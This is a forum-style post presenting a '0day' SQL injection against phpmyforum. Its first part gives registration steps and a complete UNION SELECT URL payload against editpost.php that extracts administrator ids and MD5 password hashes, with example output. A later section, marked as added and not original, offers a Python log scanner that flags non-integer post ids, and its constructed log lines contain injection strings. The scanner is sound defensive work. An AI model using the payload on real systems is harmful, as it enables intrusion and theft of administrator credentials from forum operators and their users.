
phpmyforum SQL Injection

Here is a 0day SQL injection for phpmyforum, admin hash disclosure. You need to register and post a message to make it work. This forum is completely in German, so it's a little hard to work with (if you're ignorant like me and don't know any other langs).

1. Register at forum.

2. Post a message in any forum.

3. Open the URL, replacing "24" with the id of your post.
Code:
http://target/editpost.php?id=24+union+select+concat(char(58,58,58),id,char(58,58,58),pass,char(58,58,58)),id+from+pmf_user+where+group_id=1+order+by+1+asc+/*

4. The id and md5 hash should appear in the textarea on this page. It will look like:
:::1:::21232f297a57a5a743894a0e4a801fc3:::
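
A defensive check for the request pattern in step 3, added here as an example and not part of the original post: it scans web access logs for editpost.php requests whose id parameter is not a plain integer. The log lines are constructed, and the log format and the function names are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (common log format), not from a real server.
SAMPLE_LOG = """\
203.0.113.5 - - [01/Jan/2024:10:00:00 +0000] "GET /editpost.php?id=24 HTTP/1.1" 200 5120
203.0.113.9 - - [01/Jan/2024:10:00:07 +0000] "GET /editpost.php?id=24+union+select+1,2+from+pmf_user+/* HTTP/1.1" 200 5304
203.0.113.9 - - [01/Jan/2024:10:00:09 +0000] "GET /editpost.php?id=24%20UNION%20SELECT%201,2 HTTP/1.1" 200 5304
198.51.100.2 - - [01/Jan/2024:10:01:00 +0000] "GET /index.php?id=abc HTTP/1.1" 200 900
"""

# Client address and request target from one log line.
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+"')
# Keywords and comment markers used only to annotate a finding, not to decide it.
SQL_TOKENS = re.compile(r"\b(?:union|select|from|concat|char)\b|/\*|--", re.I)


def is_valid_post_id(value):
    """A post id is a short decimal integer and nothing else (allow-list)."""
    return re.fullmatch(r"[0-9]{1,10}", value) is not None


def suspicious_requests(log_text, script="/editpost.php", param="id"):
    """Return (client, decoded id value, SQL tokens seen) for each bad request."""
    findings = []
    for line in log_text.splitlines():
        match = REQUEST_RE.match(line)
        if not match:
            continue
        client, target = match.groups()
        url = urlsplit(target)
        if not url.path.endswith(script):
            continue
        # parse_qs decodes '+' and %XX, so differently encoded payloads compare equal.
        for value in parse_qs(url.query, keep_blank_values=True).get(param, []):
            if not is_valid_post_id(value):
                tokens = sorted({t.lower() for t in SQL_TOKENS.findall(value)})
                findings.append((client, value, tokens))
    return findings


if __name__ == "__main__":
    for client, value, tokens in suspicious_requests(SAMPLE_LOG):
        print(f"{client} sent non-integer id {value!r}; SQL tokens: {tokens}")
```

The decision rests on the integer allow-list rather than on the keyword list, so a payload that avoids the listed keywords is still reported.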
